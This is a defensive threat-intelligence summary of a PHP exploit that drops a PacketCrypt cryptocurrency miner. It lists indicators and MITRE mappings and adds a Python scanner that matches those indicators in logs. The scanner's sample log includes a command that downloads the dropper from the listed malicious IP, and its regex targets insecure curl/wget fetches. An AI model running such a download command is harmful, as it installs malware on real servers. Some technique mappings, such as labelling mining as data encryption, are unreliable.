Researchers have identified a URL that exploits a server-side vulnerability in PHP scripts, allowing attackers to download and execute malicious executables. The malware, dr0p.exe, subsequently downloads pkt1.exe, which acts as a cryptocurrency miner, targeting vulnerable PHP servers. This incident emphasizes the importance of regular security updates to mitigate such threats.
Affected Platform: PHP servers
Key points:
- A URL exploits a server-side vulnerability in PHP’s system() function.
- The attack downloads a malicious executable named dr0p.exe from a remote server.
- The malware attempts to download using curl and wget, bypassing SSL verification.
- dr0p.exe downloads pkt1.exe, which is a cryptocurrency miner.
- The attack targets vulnerable PHP servers potentially exploiting CVE-2024-4577.
- Regular security patching and auditing of web servers are critical to prevent such vulnerabilities.
- The malicious IP address 23.27.51.244 is linked to the distribution of the malware.
- The PKTC wallet address associated with the attack has accumulated cryptocurrency.
MITRE Techniques:
- Command-Line Interface (T1059.003) – The malware executes commands via PHP’s system() function.
- Exploitation of Remote Services (T1210) – The attack exploits vulnerabilities in web server configurations.
- Credential Dumping (T1003) – The malware may attempt to gather credentials through compromised PHP servers.
- Data Encrypted for Impact (T1486) – The mining of cryptocurrency impacts server performance.
Indicators of Compromise:
- [IP Address] 23[.]27[.]51[.]244
- [File Hash] e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562
- [File Hash] d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36
- [File Hash] 717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397
- [Wallet Address] pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a
- See the full article for all IoCs found.
Full Research: https://gbhackers.com/php-vulnerability-packetcrypt-mining/
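As an added example (not code from the article or from the researchers it cites), the following Python scanner turns the indicators above into a log check: it flags lines that contain the listed IP, file names or SHA-256 hashes, or a curl/wget invocation with TLS verification disabled as described in the key points. The log-line format and the sample lines are constructed for the demonstration.

```python
import re

# Indicators taken from the advisory above (the IP is defanged there as 23[.]27[.]51[.]244).
ADVISORY_IP = "23.27.51.244"
ADVISORY_FILES = ("dr0p.exe", "pkt1.exe")
ADVISORY_HASHES = {
    "e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562",
    "d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36",
    "717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397",
}
# curl with -k/--insecure (including bundled flags such as -sk) or wget with
# --no-check-certificate: the "bypassing SSL verification" behaviour the advisory describes.
INSECURE_FETCH = re.compile(
    r"\bcurl\b.*?(?:\s-[a-zA-Z]*k\b|\s--insecure\b)|\bwget\b.*?\s--no-check-certificate\b"
)
SHA256 = re.compile(r"\b[0-9a-f]{64}\b")


def match_indicators(line: str) -> list:
    """Return the advisory indicators present in one log line (empty list if none)."""
    hits = []
    text = line.replace("[.]", ".")  # accept defanged IPs in pasted logs
    if ADVISORY_IP in text:
        hits.append("ip:" + ADVISORY_IP)
    for name in ADVISORY_FILES:
        if name in text.lower():
            hits.append("file:" + name)
    if INSECURE_FETCH.search(text):
        hits.append("insecure-fetch")
    for digest in SHA256.findall(text.lower()):
        if digest in ADVISORY_HASHES:
            hits.append("hash:" + digest[:12])
    return hits


def scan(lines) -> list:
    """Return (1-based line number, hits) for every line that matches at least one indicator."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := match_indicators(line))]


# Constructed sample of EDR-style process and file events (not real telemetry).
SAMPLE_LOG = [
    'parent=php-cgi.exe child=cmd.exe cmdline="curl -k -o dr0p.exe http://23[.]27[.]51[.]244/dr0p.exe"',
    'parent=cron child=curl cmdline="curl -s https://example.invalid/health"',
    "event=file_create path=C:/Windows/Temp/pkt1.exe sha256=e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562",
    'parent=php-fpm child=none msg="worker idle"',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

A web-server process spawning curl or wget at all is the stronger signal in practice; the indicator matches above confirm which campaign the activity resembles.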